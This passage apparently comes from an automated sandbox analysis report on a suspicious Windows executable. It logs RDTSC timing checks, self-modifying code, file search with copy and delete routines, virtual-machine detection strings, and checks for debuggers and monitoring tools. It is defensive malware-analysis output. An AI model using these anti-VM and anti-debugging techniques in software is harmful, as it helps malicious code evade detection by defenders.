                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE0C9 second address: FEE103 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB958B07031h 0x00000008 jmp 00007FB958B07029h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB958B07025h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F04B second address: F3F051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6B1A second address: FF6B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6B1E second address: FF6B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6B33 second address: FF6B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6E62 second address: FF6E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB958FCD44Dh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6E7B second address: FF6E81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6E81 second address: FF6EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958FCD459h 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FB958FCD446h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7008 second address: FF7013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB958B07016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF758E second address: FF7592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7592 second address: FF759C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF759C second address: FF75C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB958FCD459h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF775E second address: FF7767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7767 second address: FF777B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF777B second address: FF7781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF7FD3 second address: FF7FFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB958FCD446h 0x00000008 jp 00007FB958FCD446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FB958FCD459h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF86FD second address: FF870F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF870F second address: FF8715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF8715 second address: FF8726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B0701Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF8726 second address: FF872A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF872A second address: FF872E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF872E second address: FF873C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C533 second address: 100C539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C539 second address: 100C53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C53D second address: 100C549 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C549 second address: 100C57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB958FCD450h 0x0000000a jo 00007FB958FCD461h 0x00000010 jmp 00007FB958FCD455h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C0D3 second address: 100C0E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C0E3 second address: 100C0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C0EB second address: 100C0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100E2D8 second address: 100E302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FB958FCD446h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FB958FCD456h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F3A078 second address: F3A07F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F3A07F second address: F3A085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F3A085 second address: F3A093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102350B second address: 1023510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102CD02 second address: 102CD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102CD08 second address: 102CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102CD0C second address: 102CD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102CD10 second address: 102CD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102B888 second address: 102B88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102B88E second address: 102B8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007FB958FCD455h 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102BDAB second address: 102BDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB958B0701Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102BDB7 second address: 102BDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB958FCD455h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102BF18 second address: 102BF24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FB958B07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102C094 second address: 102C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102C099 second address: 102C0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FB958B07016h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102CA79 second address: 102CA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032FA2 second address: 1032FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103C42C second address: 103C43A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103C43A second address: 103C444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103C444 second address: 103C46B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB958FCD446h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jl 00007FB958FCD448h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103C46B second address: 103C471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103C471 second address: 103C47F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB958FCD446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 104517A second address: 10451D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB958B0701Fh 0x00000008 jmp 00007FB958B07026h 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007FB958B0701Ah 0x00000014 jmp 00007FB958B0701Ch 0x00000019 jnl 00007FB958B07016h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push ecx 0x00000023 jng 00007FB958B07022h 0x00000029 jo 00007FB958B07016h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1044FE2 second address: 1044FF7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB958FCD446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jbe 00007FB958FCD456h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10616BF second address: 10616C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1061C4C second address: 1061C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB958FCD446h 0x0000000a jo 00007FB958FCD446h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1061E1D second address: 1061E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a pop edx 0x0000000b ja 00007FB958B07033h 0x00000011 push esi 0x00000012 jnc 00007FB958B07016h 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1061E5A second address: 1061E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1062153 second address: 1062166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FB958B07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10667F8 second address: 1066819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 or dl, 00000052h 0x0000000c push 00000004h 0x0000000e cld 0x0000000f push AB87BBC9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB958FCD44Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068005 second address: 1068019 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB958B07016h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jc 00007FB958B07016h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068019 second address: 1068032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958FCD455h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068032 second address: 1068036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068036 second address: 106803C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106803C second address: 1068046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068046 second address: 106804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106804C second address: 1068081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB958B07020h 0x00000012 jmp 00007FB958B0701Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068081 second address: 1068088 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068088 second address: 10680A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FB958B0701Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F20327 second address: 4F20353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958FCD44Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F203D0 second address: 4F203E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B07024h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F203E8 second address: 4F203EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F7E39F second address: F7E3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DD1D31 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DD1C95 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F99A69 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1000612 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B84910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B84570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B83EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B71160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1485394788.0000000000961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1485394788.0000000000995000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwarev
Source: file.exe, 00000000.00000002.1485394788.0000000000995000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW?
Source: file.exe, 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13810
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13813
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13828
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13863
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13824
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B745C0 VirtualProtect ?,00000004,00000100,00000000
